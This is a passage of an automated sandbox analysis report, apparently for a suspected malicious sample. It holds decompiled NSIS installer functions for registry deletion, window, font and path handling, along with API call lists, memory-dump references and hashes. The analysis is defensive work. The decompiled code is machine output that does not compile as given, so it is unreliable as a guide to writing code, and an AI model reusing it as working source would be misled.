						RegCloseKey(_v8);
						_t35 = E00406631(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                            0x00402cdb
                                            0x00402ce4
                                            0x00402ced
                                            0x00402cf9
                                            0x00402d02
                                            0x00402d0c
                                            0x00402d31
                                            0x00402d37
                                            0x00402d3c
                                            0x00402d3d
                                            0x00402d6d
                                            0x00402d46
                                            0x00402d48
                                            0x00402d98
                                            0x00402d9b
                                            0x00000000
                                            0x00402da1
                                            0x00402d57
                                            0x00402d5c
                                            0x00402d5e
                                            0x00000000
                                            0x00000000
                                            0x00402d66
                                            0x00402d6b
                                            0x00402d6c
                                            0x00402d6c
                                            0x00402d79
                                            0x00402d81
                                            0x00402d88
                                            0x00000000
                                            0x00402db1
                                            0x00000000
                                            0x00402d90
                                            0x00402d1c
                                            0x00402d2f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402d2f
                                            0x00402db7

                                            APIs
                                            • RegEnumValueA.ADVAPI32 ref: 00402D24
                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseEnum$DeleteValue
                                            • String ID:
                                            • API String ID: 1354259210-0
                                            • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                            • Instruction ID: 3131e3f6e31e27b0aa66d3651422ecf58d36830b066a5e7c74bd8b9791dc988a
                                            • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                            • Instruction Fuzzy Hash: 21215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48F64AA68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x424740,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406186();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                            0x00401d65
                                            0x00401d69
                                            0x00401d7e
                                            0x00401d6b
                                            0x00401d6d
                                            0x00401d73
                                            0x00401d73
                                            0x00401d84
                                            0x00401d87
                                            0x00401d91
                                            0x00401d94
                                            0x00401d9c
                                            0x00401dad
                                            0x00401db0
                                            0x00401dbb
                                            0x00401db2
                                            0x00401db4
                                            0x00401db4
                                            0x00401dbf
                                            0x00401dcc
                                            0x00401df3
                                            0x00401e02
                                            0x00401e10
                                            0x00401e18
                                            0x00401e20
                                            0x00401e20
                                            0x00401e29
                                            0x00401e2f
                                            0x004029a5
                                            0x004029a5
                                            0x00402a5d
                                            0x00402a69

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
                                            • Instruction ID: 488f83a01e3392fad3bf683b4443aaeb9baaf514c425c8ec37ca45fc88de17ea
                                            • Opcode Fuzzy Hash: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
                                            • Instruction Fuzzy Hash: E9212A72E00109AFCF15DFA4DD85AAEBBB5EB88300F24417EF911F62A1CB389941DB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 73%
                                            			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b820->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b830 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b837 = 1;
				 *0x40b834 = _t15 & 0x00000001;
				 *0x40b835 = _t15 & 0x00000002;
				 *0x40b836 = _t15 & 0x00000004;
				E004062BB(_t9, _t31, _t33, 0x40b83c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b820);
				_push(_t18);
				_push(_t33);
				E00406186();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                            0x00401e35
                                            0x00401e40
                                            0x00401e42
                                            0x00401e4f
                                            0x00401e66
                                            0x00401e6b
                                            0x00401e78
                                            0x00401e7d
                                            0x00401e81
                                            0x00401e8c
                                            0x00401e93
                                            0x00401ea5
                                            0x00401eab
                                            0x00401eb0
                                            0x00401eba
                                            0x00402620
                                            0x00401569
                                            0x004029a5
                                            0x00402a5d
                                            0x00402a69

                                            APIs
                                            • GetDC.USER32(?), ref: 00401E38
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                            • ReleaseDC.USER32 ref: 00401E6B
                                            • CreateFontIndirectA.GDI32(0040B820), ref: 00401EBA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID:
                                            • API String ID: 3808545654-0
                                            • Opcode ID: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
                                            • Instruction ID: 5097186ed897f0bb8f2c49de76e9dd96fe00b68d7cb2a8ba7479d5b6a1f75869
                                            • Opcode Fuzzy Hash: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
                                            • Instruction Fuzzy Hash: 18014072504344AEE7017BA4AE89B9A7FF8E755701F10547AF141B61F2CB790445CB6C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 59%
                                            			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406186();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                            0x00401c2e
                                            0x00401c30
                                            0x00401c37
                                            0x00401c3a
                                            0x00401c3d
                                            0x00401c47
                                            0x00401c4b
                                            0x00401c4e
                                            0x00401c57
                                            0x00401c57
                                            0x00401c5a
                                            0x00401c5e
                                            0x00401c67
                                            0x00401c67
                                            0x00401c6a
                                            0x00401c6e
                                            0x00401c70
                                            0x00401cc5
                                            0x00401cc7
                                            0x00401cd0
                                            0x00401cd8
                                            0x00401cdb
                                            0x00401cdb
                                            0x00401ce4
                                            0x00000000
                                            0x00401c72
                                            0x00401c79
                                            0x00401c7b
                                            0x00401c7e
                                            0x00401c84
                                            0x00401c8b
                                            0x00401c8e
                                            0x00401cb6
                                            0x00401cea
                                            0x00401cea
                                            0x00401c90
                                            0x00401c9e
                                            0x00401ca6
                                            0x00401ca9
                                            0x00401ca9
                                            0x00401c8e
                                            0x00401ced
                                            0x00401cf0
                                            0x00401cf6
                                            0x004029a5
                                            0x004029a5
                                            0x00402a5d
                                            0x00402a69

                                            APIs
                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
                                            • Instruction ID: 90c6e89302a946556e44a8134fdeeaca46b2157ebe1368c161caa9607488c25b
                                            • Opcode Fuzzy Hash: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
                                            • Instruction Fuzzy Hash: 80216071A44208BEEB05DFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405BC0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405BC0(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                            0x00405bc1
                                            0x00405bd8
                                            0x00405be0
                                            0x00405be0
                                            0x00405be8

                                            APIs
                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040344E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405BC6
                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040344E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405BCF
                                            • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405BE0
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-3081826266
                                            • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                            • Instruction ID: d6a8f4146c737b4c1111608fba26ea94f920a63204c4a5504a78fba285be9fad
                                            • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                            • Instruction Fuzzy Hash: 2CD0A7721055307BD21237154C09ECF2A488F0230470A006BF541B6191C73C5C1187FE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405C59, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405C59(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405BEB(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}









                                            0x00405c62
                                            0x00405c69
                                            0x00405c6c
                                            0x00405c6e
                                            0x00405c72
                                            0x00405c87
                                            0x00405ca6
                                            0x00000000
                                            0x00405c8e
                                            0x00405c90
                                            0x00405c91
                                            0x00405c94
                                            0x00405c95
                                            0x00405c9d
                                            0x00000000
                                            0x00000000
                                            0x00405c9f
                                            0x00405ca2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405ca2
                                            0x00000000
                                            0x00405c91
                                            0x00405c7f
                                            0x00000000
                                            0x00405c80

                                            APIs
                                            • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nszA951.tmp,?,00405CC5,C:\Users\user\AppData\Local\Temp\nszA951.tmp,C:\Users\user\AppData\Local\Temp\nszA951.tmp,73BCFA90,?,73BCF560,00405A10,?,73BCFA90,73BCF560,00000000), ref: 00405C67
                                            • CharNextA.USER32(00000000), ref: 00405C6C
                                            • CharNextA.USER32(00000000), ref: 00405C80
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\nszA951.tmp, xrefs: 00405C5A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharNext
                                            • String ID: C:\Users\user\AppData\Local\Temp\nszA951.tmp
                                            • API String ID: 3213498283-769776495
                                            • Opcode ID: 822f20ec9a8b35058aaebb4724fdb7f7397eab756ad02150ec19b841d432d8ed
                                            • Instruction ID: 9a9653d8387983e914f74c1f8e9a863a5ef5a61ad4bce0684ac50a06ae96742d
                                            • Opcode Fuzzy Hash: 822f20ec9a8b35058aaebb4724fdb7f7397eab756ad02150ec19b841d432d8ed
                                            • Instruction Fuzzy Hash: 70F06291D0CF612BFB3256684C84B775E88CB55359F18407BDA80EA2C1C27C58808B9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403949, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403949() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2a0
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2bc
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039A6();
				return E004059F0(_t11, "C:\\Users\\jones\\AppData\\Local\\Temp\\nszA951.tmp", 7);
			}






                                            0x00403949
                                            0x00403958
                                            0x0040395b
                                            0x0040395d
                                            0x0040395d
                                            0x00403964
                                            0x0040396c
                                            0x0040396f
                                            0x00403971
                                            0x00403971
                                            0x00403971
                                            0x00403978
                                            0x0040398a

                                            APIs
                                            • CloseHandle.KERNEL32(000002A0,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040395B
                                            • CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040396F
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040394E
                                            • C:\Users\user\AppData\Local\Temp\nszA951.tmp, xrefs: 0040397F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nszA951.tmp
                                            • API String ID: 2962429428-338266008
                                            • Opcode ID: 462e3e9a24158b25b8329b1cd15e1f965bb5a7db837425cedf417ff9a75e81db
                                            • Instruction ID: e7b4e10e42ecc32fc510515b664fd575b34ef2c347d966a0cc54db6954a3096e
                                            • Opcode Fuzzy Hash: 462e3e9a24158b25b8329b1cd15e1f965bb5a7db837425cedf417ff9a75e81db
                                            • Instruction Fuzzy Hash: 6AE08C71944B1896C130AF7CAD4E9953B1C9B413367244726F078F20F0C7789AA75AEE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004052C3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E004052C3(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x420d3c != _t16) {
							_push(_t16);
							_push(6);
							 *0x420d3c = _t16;
							E00404C7F();
						}
						L11:
						return CallWindowProcA( *0x420d44, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404BFF(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004042F8(0x413);
				return 0;
			}





                                            0x004052c7
                                            0x004052d1
                                            0x004052ed
                                            0x0040530f
                                            0x00405312
                                            0x00405318
                                            0x00405322
                                            0x00405323
                                            0x00405325
                                            0x0040532b
                                            0x0040532b
                                            0x00405335
                                            0x00000000
                                            0x00405343
                                            0x004052fa
                                            0x00405332
                                            0x00405332
                                            0x00000000
                                            0x00405332
                                            0x00405306
                                            0x00405308
                                            0x00000000
                                            0x00405308
                                            0x004052d7
                                            0x00000000
                                            0x00000000
                                            0x004052de
                                            0x00000000

                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 004052F2
                                            • CallWindowProcA.USER32 ref: 00405343
                                              • Part of subcall function 004042F8: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040430A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
                                            • Instruction ID: 59df81840e01a834e8184741018ea8653580e9c1f0e113f815542439c818a584
                                            • Opcode Fuzzy Hash: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
                                            • Instruction Fuzzy Hash: 61017C71200608AFDF209F51DD81AAB3B66EB94394F50453BFA04761D1C7BA9C929F2D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405CAE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E00405CAE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00406228(0x422158, _a4);
				_t21 = E00405C59(0x422158);
				if(_t21 != 0) {
					E00406503(_t21);
					if(( *0x42475c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x422158;
						while(1) {
							_t11 = lstrlenA(0x422158);
							_push(0x422158);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040659C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C07(0x422158);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BC0();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                            0x00405cba
                                            0x00405cc5
                                            0x00405cc9
                                            0x00405cd0
                                            0x00405cdc
                                            0x00405ce8
                                            0x00405ce8
                                            0x00405d00
                                            0x00405d01
                                            0x00405d08
                                            0x00405d09
                                            0x00000000
                                            0x00000000
                                            0x00405cec
                                            0x00405cf3
                                            0x00405cfb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405cf3
                                            0x00405d0b
                                            0x00000000
                                            0x00405d1f
                                            0x00405cde
                                            0x00405ce2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405ce2
                                            0x00405ccb
                                            0x00000000

                                            APIs
                                              • Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235
                                              • Part of subcall function 00405C59: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nszA951.tmp,?,00405CC5,C:\Users\user\AppData\Local\Temp\nszA951.tmp,C:\Users\user\AppData\Local\Temp\nszA951.tmp,73BCFA90,?,73BCF560,00405A10,?,73BCFA90,73BCF560,00000000), ref: 00405C67
                                              • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
                                              • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80
